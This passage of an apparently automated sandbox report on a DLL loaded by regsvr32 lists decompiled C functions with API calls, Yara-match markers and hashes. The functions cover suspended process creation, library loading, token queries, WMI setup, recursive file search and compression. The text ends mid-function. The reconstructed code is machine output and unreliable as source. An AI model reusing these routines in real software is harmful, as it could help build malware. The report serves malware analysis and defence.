                            control_flow_graph 285 1000ae66-1000aeb3 memset CreateProcessW
                            C-Code - Quality: 47%
                            			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}








                            0x1000ae6f
                            0x1000ae75
                            0x1000ae79
                            0x1000ae7a
                            0x1000ae7b
                            0x1000ae7c
                            0x1000ae80
                            0x1000ae85
                            0x1000ae8d
                            0x1000aea5
                            0x1000aeab
                            0x1000aeb3

                            APIs
                            • memset.MSVCRT ref: 1000AE85
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessmemset
                            • String ID:
                            • API String ID: 2296119082-0
                            • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                            • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 47%
                            			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}










                            0x1000e1bf
                            0x1000e1c2
                            0x1000e1c8
                            0x1000e1ca
                            0x1000e1cf
                            0x1000e1d1
                            0x1000e1db
                            0x1000e1dc
                            0x1000e1eb
                            0x1000e1de
                            0x1000e1de
                            0x1000e1de
                            0x1000e1ef
                            0x1000e1f6
                            0x1000e1fc
                            0x1000e1fc
                            0x1000e201
                            0x1000e20c

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                            • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48sleepstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 298 1000ccc0-1000ccce 299 1000ccd0-1000ccd1 298->299 300 1000cd1f-1000cd32 Sleep 298->300 301 1000ccd3-1000ccdf 299->301 302 1000cce1-1000cce7 301->302 303 1000cd15-1000cd1c 301->303 304 1000ccea-1000ccff lstrcmpiA 302->304 303->301 305 1000cd1e 303->305 306 1000cd10-1000cd13 304->306 307 1000cd01-1000cd0c 304->307 305->300 306->303 307->304 308 1000cd0e 307->308 308->303
                            C-Code - Quality: 100%
                            			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}










                            0x1000ccc6
                            0x1000ccc9
                            0x1000ccce
                            0x1000ccd1
                            0x1000ccd3
                            0x1000ccd3
                            0x1000ccd3
                            0x1000ccd6
                            0x1000ccd8
                            0x1000ccdf
                            0x1000cce7
                            0x1000ccea
                            0x1000ccf4
                            0x1000ccfa
                            0x1000ccfa
                            0x1000ccff
                            0x00000000
                            0x00000000
                            0x1000cd04
                            0x1000cd05
                            0x1000cd0c
                            0x00000000
                            0x00000000
                            0x1000cd0e
                            0x00000000
                            0x1000cd0c
                            0x1000cd13
                            0x1000cd13
                            0x1000cd15
                            0x1000cd15
                            0x1000cd16
                            0x1000cd19
                            0x1000cd19
                            0x1000cd1e
                            0x1000cd26
                            0x1000cd32

                            APIs
                            • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                            • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleeplstrcmpi
                            • String ID:
                            • API String ID: 1261054337-0
                            • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                            • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 309 10005e96-10005eb5 ExitProcess
                            C-Code - Quality: 100%
                            			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}




                            0x10005e96
                            0x10005ea3
                            0x10005ead

                            APIs
                            • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                            • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 311 100085ef-10008603 HeapCreate
                            C-Code - Quality: 100%
                            			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}




                            0x100085f8
                            0x100085fe
                            0x10008603

                            APIs
                            • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                            • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82COMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x2e0fc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x2e0fc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x2e0fc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                            0x1000ba69
                            0x1000ba6b
                            0x1000ba72
                            0x1000ba74
                            0x1000ba77
                            0x1000ba7c
                            0x1000ba81
                            0x1000ba8b
                            0x1000ba8e
                            0x1000ba91
                            0x1000ba96
                            0x1000ba98
                            0x1000ba9e
                            0x1000bafe
                            0x1000bb06
                            0x1000bb0c
                            0x1000bb13
                            0x1000bb19
                            0x00000000
                            0x1000bb1a
                            0x1000baa3
                            0x1000baa4
                            0x1000baa5
                            0x1000baa6
                            0x1000baa7
                            0x1000baa8
                            0x1000baa9
                            0x1000baaa
                            0x1000baaf
                            0x1000bab1
                            0x1000bab6
                            0x1000bab7
                            0x1000bac1
                            0x00000000
                            0x00000000
                            0x1000bac5
                            0x1000baf1
                            0x1000baf1
                            0x1000baf9
                            0x1000bafc
                            0x00000000
                            0x1000bafc
                            0x1000bac7
                            0x1000bac7
                            0x1000baca
                            0x1000bacd
                            0x1000bacd
                            0x1000bad0
                            0x1000bad2
                            0x1000badc
                            0x00000000
                            0x00000000
                            0x1000bae1
                            0x1000bae2
                            0x1000bae5
                            0x1000baea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000baec
                            0x1000baf0
                            0x00000000
                            0x1000baf0
                            0x1000bb1f

                            APIs
                              • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                              • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                              • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                              • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                              • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                            • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
                            • String ID:
                            • API String ID: 3752664914-0
                            • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                            • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                            • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                            • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                            0x1000d530
                            0x1000d533
                            0x1000d536
                            0x1000d547
                            0x1000d54d
                            0x1000d55e
                            0x1000d566
                            0x1000d5b7
                            0x1000d5b7
                            0x1000d5bc
                            0x1000d5c1
                            0x1000d5c1
                            0x1000d5c4
                            0x1000d5c9
                            0x1000d5ce
                            0x1000d5ce
                            0x1000d5d1
                            0x1000d568
                            0x1000d569
                            0x1000d56f
                            0x1000d580
                            0x1000d585
                            0x00000000
                            0x1000d587
                            0x1000d594
                            0x1000d59c
                            0x00000000
                            0x1000d59e
                            0x1000d5a0
                            0x1000d5a8
                            0x00000000
                            0x1000d5aa
                            0x1000d5ad
                            0x1000d5b3
                            0x1000d5b3
                            0x1000d5a8
                            0x1000d59c
                            0x1000d585
                            0x1000d5d6

                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                            • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 2855449287-0
                            • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                            • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x2e0faa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x2e0fd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x2e0faa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}























                            0x1000aeb4
                            0x1000aec0
                            0x1000aec2
                            0x1000aec4
                            0x1000aeca
                            0x1000aecf
                            0x1000aed2
                            0x1000aed7
                            0x1000b011
                            0x1000b011
                            0x1000aeeb
                            0x1000aef0
                            0x1000b000
                            0x00000000
                            0x1000b00c
                            0x1000aef8
                            0x1000aef9
                            0x1000af00
                            0x1000af2f
                            0x1000af82
                            0x1000af82
                            0x1000af8a
                            0x1000af8b
                            0x1000af96
                            0x1000af98
                            0x1000af9b
                            0x1000afa0
                            0x1000afa2
                            0x1000afaa
                            0x1000afb0
                            0x1000afb2
                            0x1000afb4
                            0x1000afc9
                            0x1000afce
                            0x1000afd7
                            0x1000afdd
                            0x00000000
                            0x1000afa0
                            0x1000af31
                            0x1000af33
                            0x1000af33
                            0x1000af33
                            0x1000af3f
                            0x1000af40
                            0x1000af4a
                            0x00000000
                            0x00000000
                            0x1000af57
                            0x1000af5c
                            0x1000af61
                            0x00000000
                            0x00000000
                            0x1000af63
                            0x1000af6a
                            0x1000af70
                            0x1000af70
                            0x1000af73
                            0x1000af80
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000af80
                            0x1000afde
                            0x1000afe6
                            0x1000aff0
                            0x1000aff0
                            0x1000aff7
                            0x1000affd
                            0x00000000

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                            • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNext
                            • String ID:
                            • API String ID: 1690352074-0
                            • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                            • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                            • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                            • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1518329722-0
                            • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                            • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                            • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                            • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10016EB0, Relevance: .4, Instructions: 359COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
